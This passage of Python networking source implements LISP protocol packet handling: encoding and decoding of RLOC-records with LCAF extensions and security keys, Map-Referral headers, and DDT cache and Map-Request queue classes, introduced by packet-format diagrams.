# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_rloc_record():
    """One RLOC-record from a Map-Request/Map-Reply/Map-Register
    EID-record (see format diagrams above). Holds the priority/weight
    values, the L/p/R flag bits, the locator address, and any
    LCAF-encoded extras (geo, ELP, RLE, JSON, security keys, rloc-name)
    that accompanied the locator on the wire.
    """
    def __init__(self):
        self.priority = 0
        self.weight = 0
        self.mpriority = 0      # multicast priority
        self.mweight = 0        # multicast weight
        self.local_bit = False
        self.probe_bit = False
        self.reach_bit = False
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.rloc_name = None
        self.keys = None        # lisp-crypto keys, index 1 is the live key
    #enddef
    def print_rloc_name(self, cour=False):
        """Return 'rloc-name: <name>' (courier-formatted when 'cour'),
        or "" when no rloc-name is present."""
        if (self.rloc_name == None): return("")
        rloc_name = self.rloc_name
        if (cour): rloc_name = lisp_print_cour(rloc_name)
        return('rloc-name: {}'.format(blue(rloc_name, cour)))
    #enddef
    def print_record(self, indent):
        """Log a one-line summary of this RLOC-record, including any
        decoded geo/elp/rle/json/security extras."""
        rloc_str = self.print_rloc_name()
        if (rloc_str != ""): rloc_str = ", " + rloc_str
        geo_str = ""
        if (self.geo):
            name = ""
            if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
            geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
        #endif
        elp_str = ""
        if (self.elp):
            name = ""
            if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
            elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
        #endif
        rle_str = ""
        if (self.rle):
            name = ""
            if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
            rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False, True))
        #endif
        json_str = ""
        if (self.json):
            name = ""
            if (self.json.json_name):
                name = "'{}' ".format(self.json.json_name)
            #endif
            json_str = ", json: {}".format(self.json.print_json(False))
        #endif
        sec_str = ""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            sec_str = ", " + self.keys[1].print_keys()
        #endif
        line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
            + "{}{}{}{}{}{}{}")
        lprint(line.format(indent, self.print_flags(), self.priority,
            self.weight, self.mpriority, self.mweight, self.rloc.afi,
            red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
            elp_str, rle_str, json_str, sec_str))
    #enddef
    def print_flags(self):
        """Return the 3-char flag string; uppercase means the bit is set
        (L=local, P=probe, R=reachable)."""
        return("{}{}{}".format("L" if self.local_bit else "l", "P" \
            if self.probe_bit else "p", "R" if self.reach_bit else "r"))
    #enddef
    def store_rloc_entry(self, rloc_entry):
        """Copy an internal RLOC entry into this wire-format record.
        Uses the translated RLOC when one exists (NATed case) and
        resolves geo/elp/rle/json names against the configured lists."""
        rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
            else rloc_entry.translated_rloc
        self.rloc.copy_address(rloc)
        if (rloc_entry.rloc_name):
            self.rloc_name = rloc_entry.rloc_name
        #endif
        if (rloc_entry.geo):
            self.geo = rloc_entry.geo
        else:
            name = rloc_entry.geo_name
            if (name and lisp_geo_list.has_key(name)):
                self.geo = lisp_geo_list[name]
            #endif
        #endif
        if (rloc_entry.elp):
            self.elp = rloc_entry.elp
        else:
            name = rloc_entry.elp_name
            if (name and lisp_elp_list.has_key(name)):
                self.elp = lisp_elp_list[name]
            #endif
        #endif
        if (rloc_entry.rle):
            self.rle = rloc_entry.rle
        else:
            name = rloc_entry.rle_name
            if (name and lisp_rle_list.has_key(name)):
                self.rle = lisp_rle_list[name]
            #endif
        #endif
        if (rloc_entry.json):
            self.json = rloc_entry.json
        else:
            name = rloc_entry.json_name
            if (name and lisp_json_list.has_key(name)):
                self.json = lisp_json_list[name]
            #endif
        #endif
        self.priority = rloc_entry.priority
        self.weight = rloc_entry.weight
        self.mpriority = rloc_entry.mpriority
        self.mweight = rloc_entry.mweight
    #enddef
    def encode_lcaf(self):
        """Encode the locator as an AFI-List LCAF carrying, in order:
        RLOC address, then optional rloc-name, geo, ELP, RLE, security
        keys, and JSON sub-LCAFs."""
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        gpkt = ""
        if (self.geo):
            gpkt = self.geo.encode_geo()
        #endif
        epkt = ""
        if (self.elp):
            elp_recs = ""
            for elp_node in self.elp.elp_nodes:
                afi = socket.htons(elp_node.address.afi)
                flags = 0
                if (elp_node.eid): flags |= 0x4
                if (elp_node.probe): flags |= 0x2
                if (elp_node.strict): flags |= 0x1
                flags = socket.htons(flags)
                elp_recs += struct.pack("HH", flags, afi)
                elp_recs += elp_node.address.pack_address()
            #endfor
            elp_len = socket.htons(len(elp_recs))
            epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
                0, elp_len)
            epkt += elp_recs
        #endif
        rpkt = ""
        if (self.rle):
            rle_recs = ""
            for rle_node in self.rle.rle_nodes:
                afi = socket.htons(rle_node.address.afi)
                rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
                rle_recs += rle_node.address.pack_address()
                if (rle_node.rloc_name):
                    rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
                    rle_recs += rle_node.rloc_name + "\0"
                #endif
            #endfor
            rle_len = socket.htons(len(rle_recs))
            rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
                0, rle_len)
            rpkt += rle_recs
        #endif
        jpkt = ""
        if (self.json):
            lcaf_len = socket.htons(len(self.json.json_string) + 2)
            json_len = socket.htons(len(self.json.json_string))
            jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
                0, lcaf_len, json_len)
            jpkt += self.json.json_string
            jpkt += struct.pack("H", 0)
        #endif
        spkt = ""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            spkt = self.keys[1].encode_lcaf(self.rloc)
        #endif
        npkt = ""
        if (self.rloc_name):
            npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
            npkt += self.rloc_name + "\0"
        #endif
        apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
            len(jpkt) + self.rloc.addr_length() + len(npkt)
        apkt_len = socket.htons(apkt_len)
        apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
            0, apkt_len, socket.htons(self.rloc.afi))
        apkt += self.rloc.pack_address()
        return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
    #enddef
    def encode(self):
        """Pack this RLOC-record. A bare address gets plain AFI
        encoding; any extras force the LCAF encoding (the 2-byte AFI
        already packed is stripped and replaced)."""
        flags = 0
        if (self.local_bit): flags |= 0x0004
        if (self.probe_bit): flags |= 0x0002
        if (self.reach_bit): flags |= 0x0001
        packet = struct.pack("BBBBHH", self.priority, self.weight,
            self.mpriority, self.mweight, socket.htons(flags),
            socket.htons(self.rloc.afi))
        if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
            or self.json):
            packet = packet[0:-2] + self.encode_lcaf()
        else:
            packet += self.rloc.pack_address()
        #endif
        return(packet)
    #enddef
    def decode_lcaf(self, packet, nonce):
        """Decode one LCAF-encoded locator, dispatching on the LCAF type
        (AFI-List, Geo-Coord, JSON, ELP, RLE, Security); any other type
        is skipped over. Returns the remaining packet or None on a
        malformed encoding."""
        packet_format = "HBBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
            struct.unpack(packet_format, packet[:format_size])
        lcaf_len = socket.ntohs(lcaf_len)
        packet = packet[format_size::]
        if (lcaf_len > len(packet)): return(None)
        #
        # Process AFI-List LCAF.
        #
        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
            while (lcaf_len > 0):
                packet_format = "H"
                format_size = struct.calcsize(packet_format)
                if (lcaf_len < format_size): return(None)
                packet_len = len(packet)
                afi = struct.unpack(packet_format, packet[:format_size])[0]
                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF):
                    # Nested LCAF inside the list - recurse.
                    packet = self.decode_lcaf(packet, nonce)
                    if (packet == None): return(None)
                else:
                    packet = packet[format_size::]
                    self.rloc_name = None
                    if (afi == LISP_AFI_NAME):
                        packet, rloc_name = lisp_decode_dist_name(packet)
                        self.rloc_name = rloc_name
                    else:
                        self.rloc.afi = afi
                        packet = self.rloc.unpack_address(packet)
                        if (packet == None): return(None)
                        self.rloc.mask_len = self.rloc.host_mask_len()
                    #endif
                #endif
                # Account for however many bytes this element consumed.
                lcaf_len -= packet_len - len(packet)
            #endwhile
        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
            #
            # Process Geo-Coordinate LCAF.
            #
            geo = lisp_geo("")
            packet = geo.decode_geo(packet, lcaf_len, rsvd2)
            if (packet == None): return(None)
            self.geo = geo
        elif (lcaf_type == LISP_LCAF_JSON_TYPE):
            #
            # Process JSON LCAF.
            #
            packet_format = "H"
            format_size = struct.calcsize(packet_format)
            if (lcaf_len < format_size): return(None)
            json_len = struct.unpack(packet_format, packet[:format_size])[0]
            json_len = socket.ntohs(json_len)
            if (lcaf_len < format_size + json_len): return(None)
            packet = packet[format_size::]
            self.json = lisp_json("", packet[0:json_len])
            packet = packet[json_len::]
        elif (lcaf_type == LISP_LCAF_ELP_TYPE):
            #
            # Process ELP LCAF.
            #
            elp = lisp_elp(None)
            elp.elp_nodes = []
            while (lcaf_len > 0):
                flags, afi = struct.unpack("HH", packet[:4])
                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)
                elp_node = lisp_elp_node()
                elp.elp_nodes.append(elp_node)
                flags = socket.ntohs(flags)
                elp_node.eid = (flags & 0x4)
                elp_node.probe = (flags & 0x2)
                elp_node.strict = (flags & 0x1)
                elp_node.address.afi = afi
                elp_node.address.mask_len = elp_node.address.host_mask_len()
                packet = elp_node.address.unpack_address(packet[4::])
                lcaf_len -= elp_node.address.addr_length() + 4
            #endwhile
            elp.select_elp_node()
            self.elp = elp
        elif (lcaf_type == LISP_LCAF_RLE_TYPE):
            #
            # Process RLE LCAF.
            #
            rle = lisp_rle(None)
            rle.rle_nodes = []
            while (lcaf_len > 0):
                x, y, level, afi = struct.unpack("HBBH", packet[:6])
                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)
                rle_node = lisp_rle_node()
                rle.rle_nodes.append(rle_node)
                rle_node.level = level
                rle_node.address.afi = afi
                rle_node.address.mask_len = rle_node.address.host_mask_len()
                packet = rle_node.address.unpack_address(packet[6::])
                lcaf_len -= rle_node.address.addr_length() + 6
                # An optional distinguished-name AFI may follow each node.
                if (lcaf_len >= 2):
                    afi = struct.unpack("H", packet[:2])[0]
                    if (socket.ntohs(afi) == LISP_AFI_NAME):
                        packet = packet[2::]
                        packet, rle_node.rloc_name = \
                            lisp_decode_dist_name(packet)
                        if (packet == None): return(None)
                        lcaf_len -= len(rle_node.rloc_name) + 1 + 2
                    #endif
                #endif
            #endwhile
            self.rle = rle
            self.rle.build_forwarding_list()
        elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
            #
            # Get lisp_key() data structure so we can parse keys in the Map-
            # Reply RLOC-record. Then get the RLOC address.
            #
            orig_packet = packet
            decode_key = lisp_keys(1)
            packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
            if (packet == None): return(None)
            #
            # Other side may not do ECDH.
            #
            cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
            if (decode_key.cipher_suite in cs_list):
                if (decode_key.cipher_suite == LISP_CS_25519_CBC):
                    key = lisp_keys(1, do_poly=False, do_chacha=False)
                #endif
                if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
                    key = lisp_keys(1, do_poly=True, do_chacha=True)
                #endif
            else:
                key = lisp_keys(1, do_poly=False, do_chacha=False)
            #endif
            packet = key.decode_lcaf(orig_packet, lcaf_len)
            if (packet == None): return(None)
            if (len(packet) < 2): return(None)
            afi = struct.unpack("H", packet[:2])[0]
            self.rloc.afi = socket.ntohs(afi)
            if (len(packet) < self.rloc.addr_length()): return(None)
            packet = self.rloc.unpack_address(packet[2::])
            if (packet == None): return(None)
            self.rloc.mask_len = self.rloc.host_mask_len()
            #
            # Some RLOC records may not have RLOC addresses but other LCAF
            # types. Don't process security keys because we need RLOC addresses
            # to index into security data structures.
            #
            if (self.rloc.is_null()): return(packet)
            rloc_name_str = self.rloc_name
            if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
            #
            # If we found no stored key, store the newly created lisp_keys()
            # to the RLOC list if and only if a remote public-key was supplied
            # in the Map-Reply.
            #
            stored_key = self.keys[1] if self.keys else None
            if (stored_key == None):
                if (key.remote_public_key == None):
                    string = bold("No remote encap-public-key supplied", False)
                    lprint("    {} for {}".format(string, rloc_name_str))
                    key = None
                else:
                    string = bold("New encap-keying with new state", False)
                    lprint("    {} for {}".format(string, rloc_name_str))
                    key.compute_shared_key("encap")
                #endif
            #endif
            #
            # If we have stored-key, the other side received the local public
            # key that is stored in variable 'stored_key'. If the remote side
            # did not supply a public-key, it doesn't want to do lisp-crypto.
            # If it did supply a public key, check to see if the same as
            # last time, and if so, do nothing, else we do a rekeying.
            #
            if (stored_key):
                if (key.remote_public_key == None):
                    key = None
                    remote = bold("Remote encap-unkeying occurred", False)
                    lprint("    {} for {}".format(remote, rloc_name_str))
                elif (stored_key.compare_keys(key)):
                    key = stored_key
                    lprint("    Maintain stored encap-keys for {}".format( \
                        rloc_name_str))
                else:
                    if (stored_key.remote_public_key == None):
                        string = "New encap-keying for existing state"
                    else:
                        string = "Remote encap-rekeying"
                    #endif
                    lprint("    {} for {}".format(bold(string, False),
                        rloc_name_str))
                    stored_key.remote_public_key = key.remote_public_key
                    stored_key.compute_shared_key("encap")
                    key = stored_key
                #endif
            #endif
            self.keys = [None, key, None, None]
        else:
            #
            # All other LCAFs we skip over and ignore.
            #
            packet = packet[lcaf_len::]
        #endif
        return(packet)
    #enddef
    def decode(self, packet, nonce):
        """Parse one RLOC-record from 'packet'. Handles both a plain
        AFI-encoded locator and LCAF encodings via decode_lcaf().
        Returns the remaining bytes or None on error."""
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        self.priority, self.weight, self.mpriority, self.mweight, flags, \
            afi = struct.unpack(packet_format, packet[:format_size])
        flags = socket.ntohs(flags)
        afi = socket.ntohs(afi)
        self.local_bit = True if (flags & 0x0004) else False
        self.probe_bit = True if (flags & 0x0002) else False
        self.reach_bit = True if (flags & 0x0001) else False
        if (afi == LISP_AFI_LCAF):
            # Back up 2 bytes so decode_lcaf() sees the LCAF AFI word.
            packet = packet[format_size-2::]
            packet = self.decode_lcaf(packet, nonce)
        else:
            self.rloc.afi = afi
            packet = packet[format_size::]
            packet = self.rloc.unpack_address(packet)
        #endif
        self.rloc.mask_len = self.rloc.host_mask_len()
        return(packet)
    #enddef
    def end_of_rlocs(self, packet, rloc_count):
        """Skip 'rloc_count' RLOC-records, returning the packet position
        after the last one (None on a malformed record)."""
        for i in range(rloc_count):
            packet = self.decode(packet, None)
            if (packet == None): return(None)
        #endfor
        return(packet)
    #enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
    """
    Encoder/decoder for the fixed header of a LISP Map-Referral message
    (type 6): the type/record-count first longword plus a 64-bit nonce.
    See the packet diagram above.
    """
    def __init__(self):
        self.record_count = 0
        self.nonce = 0
    #enddef
    def print_map_referral(self):
        line = "{} -> record-count: {}, nonce: 0x{}"
        lprint(line.format(bold("Map-Referral", False), self.record_count,
            lisp_hex_string(self.nonce)))
    #enddef
    def encode(self):
        #
        # Type in the high nibble, record count in the low byte.
        #
        first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
        header = struct.pack("I", socket.htonl(first_long))
        header += struct.pack("Q", self.nonce)
        return(header)
    #enddef
    def decode(self, packet):
        size = struct.calcsize("I")
        if (len(packet) < size): return(None)

        first_long = socket.ntohl(struct.unpack("I", packet[:size])[0])
        self.record_count = first_long & 0xff
        packet = packet[size::]

        size = struct.calcsize("Q")
        if (len(packet) < size): return(None)

        self.nonce = struct.unpack("Q", packet[:size])[0]
        return(packet[size::])
    #enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
    """
    A DDT cache entry built from the "lisp ddt-authoritative-prefix"
    and "lisp delegate" commands. self.delegation_set is a list of
    lisp_ddt_node()s the EID/group prefix is delegated to.
    """
    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.delegation_set = []
        self.source_cache = None
        self.map_referrals_sent = 0
    #enddef
    def is_auth_prefix(self):
        #
        # Authoritative means no delegations configured and not a (*,G)
        # entry.
        #
        return(len(self.delegation_set) == 0 and self.is_star_g() == False)
    #enddef
    def is_ms_peer_entry(self):
        ds = self.delegation_set
        if (len(ds) == 0): return(False)
        return(ds[0].is_ms_peer())
    #enddef
    def print_referral_type(self):
        #
        # All delegation nodes share a type, so the first one decides.
        #
        if (len(self.delegation_set) == 0): return("unknown")
        return(self.delegation_set[0].print_node_type())
    #enddef
    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))
    #enddef
    def add_cache(self):
        if (self.group.is_null()):
            lisp_ddt_cache.add_cache(self.eid, self)
            return
        #endif

        #
        # Multicast entry: hang this (S,G) off a parent entry keyed by
        # the group, creating the parent on first use.
        #
        parent = lisp_ddt_cache.lookup_cache(self.group, True)
        if (parent == None):
            parent = lisp_ddt_entry()
            parent.eid.copy_address(self.group)
            parent.group.copy_address(self.group)
            lisp_ddt_cache.add_cache(self.group, parent)
        #endif
        if (self.eid.is_null()): self.eid.make_default_route(parent.group)
        parent.add_source_entry(self)
    #enddef
    def add_source_entry(self, source_ddt):
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ddt.eid, source_ddt)
    #enddef
    def lookup_source_cache(self, source, exact):
        if (self.source_cache == None): return(None)
        return(self.source_cache.lookup_cache(source, exact))
    #enddef
    def is_star_g(self):
        #
        # (*,G) is represented as eid == group with a non-null group.
        #
        if (self.group.is_null()): return(False)
        return(self.eid.is_exact_match(self.group))
    #enddef
#endclass
class lisp_ddt_node():
    """
    One delegation target of a DDT entry. A node is exactly one of:
    a DDT child, a map-server child, or a map-server peer.
    """
    def __init__(self):
        self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.map_server_peer = False
        self.map_server_child = False
        self.priority = 0
        self.weight = 0
    #enddef
    def print_node_type(self):
        if (self.is_ddt_child()): return("ddt-child")
        if (self.is_ms_child()): return("map-server-child")
        if (self.is_ms_peer()): return("map-server-peer")
    #enddef
    def is_ddt_child(self):
        #
        # A DDT child is a node that is neither kind of map-server.
        #
        return(not (self.map_server_child or self.map_server_peer))
    #enddef
    def is_ms_child(self):
        return(self.map_server_child)
    #enddef
    def is_ms_peer(self):
        return(self.map_server_peer)
    #enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
    """
    A Map-Request queued on a Map-Resolver while it walks the DDT
    hierarchy waiting for a Map-Referral from a DDT-node or Map-Server.
    Queued entries are keyed by str(nonce) in lisp_ddt_map_requestQ.
    """
    def __init__(self, lisp_sockets, packet, eid, group, nonce):
        self.uptime = lisp_get_timestamp()
        self.lisp_sockets = lisp_sockets
        self.packet = packet
        self.eid = eid
        self.group = group
        self.nonce = nonce
        self.mr_source = None
        self.sport = 0
        self.itr = None
        self.retry_count = 0
        self.send_count = 0
        self.retransmit_timer = None
        self.last_request_sent_to = None
        self.from_pitr = False
        self.tried_root = False
        self.last_cached_prefix = [None, None]
    #enddef
    def print_ddt_map_request(self):
        # One-line summary of the queued request for the log.
        lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
            "P" if self.from_pitr else "",
            red(self.itr.print_address(), False),
            green(self.eid.print_address(), False), self.nonce))
    #enddef
    def queue_map_request(self):
        # Arm the retransmit timer and index the request by nonce.
        self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
            lisp_retransmit_ddt_map_request, [self])
        self.retransmit_timer.start()
        lisp_ddt_map_requestQ[str(self.nonce)] = self
    #enddef
    def dequeue_map_request(self):
        self.retransmit_timer.cancel()
        #
        # Use "in" rather than dict.has_key(); has_key() was removed in
        # Python 3 and "in" behaves identically on Python 2.
        #
        if (str(self.nonce) in lisp_ddt_map_requestQ):
            lisp_ddt_map_requestQ.pop(str(self.nonce))
        #endif
    #enddef
    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))
    #enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
#
# Internal-only action values; negative values are never put on the wire.
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
#
# On-the-wire Map-Referral action values from the table above.
#
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
#
# Display strings indexed by the non-negative action values above.
#
lisp_map_referral_action_string = [
    "node-referral", "ms-referral", "ms-ack", "ms-not-registered",
